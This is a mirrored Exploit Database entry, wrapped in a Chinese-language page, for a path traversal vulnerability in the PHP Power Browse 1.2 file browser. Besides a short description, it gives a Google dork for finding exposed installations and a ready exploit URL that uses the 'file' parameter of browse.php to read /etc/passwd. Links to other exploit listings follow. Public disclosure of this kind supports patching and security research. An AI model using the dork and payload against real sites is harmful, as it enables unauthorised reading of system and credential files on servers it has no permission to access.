PHP Power Browse 1.2 – Directory Traversal

Exploit Database
98 阅读

作者： Manuel Mancera

日期： 2016-08-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40204/

# Exploit Title: PHP Power Browse v1.2 - Path Traversal
# Google Dork:
intitle:PHP Power Browse inurl:browse.php
# Exploit Author: Manuel Mancera (sinkmanu)|sinkmanu (at) gmail
(dot) com
# Software URL: https://github.com/arzynik/PHPPowerBrowse
# Version: 1.2
# Vulnerability Type : Path traversal
# Severity : High

### Description ###

This file browser is vulnerable to path traversal and allow to an
attacker to access to files and directories that are stored outside the
web root folder.

### Exploit ###

http://site/browse.php?p=source&file=/etc/passwd

last Exploits
PHP Power Browse 1.2 – Directory Traversal的更多信息

WordPress Plugin WP Easy Slideshow 1.0.3 – Multiple Vulnerabilities：
Joomla! Component BF Quiz 1.3.0 – SQL Injection (1)：
WP Rocket < 2.10.3 - Local File Inclusion (LFI)：
Sahi pro 7.x/8.x – Directory Traversal：
Maarch LetterBox 2.8 – (Authentication Bypass) Insecure Cookies：
Voting System 1.0 – Remote Code Execution (Unauthenticated)：
Tickets CAD 2.20G – Multiple Vulnerabilities：
Facebook Profile MyBB Plugin 2.4 – Persistent Cross-Site Scripting：